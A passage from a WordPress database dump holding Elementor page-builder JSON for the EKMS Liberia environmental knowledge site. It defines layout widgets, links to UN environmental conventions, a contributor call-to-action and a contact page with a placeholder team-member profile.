Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(14507,2299,'_elementor_version','2.7.5'),(14508,2299,'_elementor_template_type','wp-page'),(14509,2299,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(14532,2305,'_elementor_edit_mode','builder'),(14533,2305,'_elementor_template_type','wp-page'),(14534,2305,'_elementor_version','2.7.5'),(14535,2305,'_wp_page_template','default'),(14536,2305,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2300,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-13.jpg\"},\"member_first_name\":\"John\",\"member_last_name\":\"Borthwick\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"}